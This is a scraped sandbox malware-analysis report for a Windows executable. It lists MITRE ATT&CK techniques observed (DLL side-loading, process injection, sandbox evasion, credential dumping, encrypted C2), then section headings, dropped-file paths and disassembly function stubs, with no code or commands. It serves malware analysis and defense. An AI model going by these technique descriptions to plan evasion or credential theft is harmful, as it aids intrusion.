Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report YKzxWyqI6Y.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\-4248133

C:\Users\user\AppData\Local\Temp\aut222.tmp

C:\Users\user\AppData\Local\Temp\differences

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
YKzxWyqI6Y.exe

Function 00418E83 Relevance: 1.7, Strings: 1, Instructions: 436
COMMON

Function 00418013 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 0042CF23 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Function 03B735C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 03B72B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 03B72DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 004147F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63
threadwindowCOMMON

Function 00414813 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Function 0042D283 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Function 00418093 Relevance: 1.6, APIs: 1, Instructions: 50
libraryloaderCOMMON

Function 0042D233 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Function 0042D2D3 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Function 03B72C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE